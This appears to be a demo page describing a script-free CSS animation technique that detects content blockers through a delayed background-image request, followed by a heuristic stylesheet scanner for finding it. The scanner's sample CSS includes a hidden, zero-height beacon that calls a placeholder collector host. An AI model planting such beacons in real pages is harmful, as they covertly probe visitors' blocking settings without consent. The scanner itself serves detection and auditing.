This page is designed to test the CSS animation attack. The attack uses a CSS animation to wait for 1s before loading the signal image as a background image. If the element is blocked, the browser should never send the request for the background image.
Attack Pros
This attack does not require any script. All scripts present in this demo are strictly to help visualize the attack: one script connects a service worker to act like the adversary server, and other scripts help with visualizing the attack parameters for the viewer.
This attack can be stealthy. At this moment, even while not trying to hide the images, many images we load are originally single pixels and don't show up. We make the attack boxes invisible by reducing the height to 0 and allowing no events to pass through. This way, the attack can be hidden from the user.
The attack works even if JavaScript is disabled.
The attack is fast and does not require user interaction.
The attack works correctly even if the unblocked URL does not exist. The browser still displays something, which triggers the background image request after 1s.
Attack Cons
The attack is restricted to generic rules.
The attack does not work in Safari, which still loads the image even if the element is not displayed.
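Because the technique needs no script, auditing a page for it means inspecting its stylesheets: look for a @keyframes rule that introduces a background url() and for the selectors that run that animation. The scanner below is an added example, not code from this demo; the sample stylesheet, selector names and URL are constructed placeholders, and the regex-based parsing is a heuristic assumption rather than a full CSS parser.

```javascript
// Added example: heuristic stylesheet scanner, not part of the original demo.
// Flags @keyframes blocks that set a background image via url(), and
// lists the selectors that run those animations.

// Constructed sample stylesheet; selectors and URL are placeholders.
const SAMPLE_CSS = `
@keyframes probe-a { from { opacity: 1; } to { background-image: url("https://collector.example/s?r=1"); } }
@keyframes fade { from { opacity: 0; } to { opacity: 1; } }
.example-blocked-class { height: 0; pointer-events: none; animation: probe-a 1s forwards; }
.hero { animation-name: fade; animation-duration: 2s; }
`;

// Return the index just past the brace that closes the block opened at `open`.
function blockEnd(css, open) {
  let depth = 0;
  for (let i = open; i < css.length; i++) {
    if (css[i] === "{") depth++;
    else if (css[i] === "}" && --depth === 0) return i + 1;
  }
  return css.length; // unterminated block: treat the rest of the input as its body
}

function findAnimatedImageLoads(css) {
  const suspicious = new Map(); // keyframes name -> URLs requested by its frames
  let rest = "";                // stylesheet with the @keyframes blocks removed
  let pos = 0;
  const kf = /@(?:-webkit-)?keyframes\s+([\w-]+)\s*\{/g;
  for (let m; (m = kf.exec(css)); ) {
    const end = blockEnd(css, m.index + m[0].length - 1);
    const body = css.slice(m.index, end);
    const urls = [...body.matchAll(/background(?:-image)?\s*:[^;}]*url\(\s*["']?([^"')]+)/gi)].map(u => u[1]);
    if (urls.length) suspicious.set(m[1], urls);
    rest += css.slice(pos, m.index);
    pos = kf.lastIndex = end;
  }
  rest += css.slice(pos);
  const findings = [];
  for (const r of rest.matchAll(/([^{}]+)\{([^{}]*)\}/g)) {
    for (const d of r[2].matchAll(/animation(?:-name)?\s*:([^;]+)/gi)) {
      for (const [name, urls] of suspicious) {
        if (d[1].split(/[\s,]+/).includes(name)) findings.push({ selector: r[1].trim(), animation: name, urls });
      }
    }
  }
  return findings;
}
console.log(findAnimatedImageLoads(SAMPLE_CSS));
```

Each finding names a selector whose animation triggers an image request; on a real page these are the rules to review by hand, since animated backgrounds also have ordinary uses.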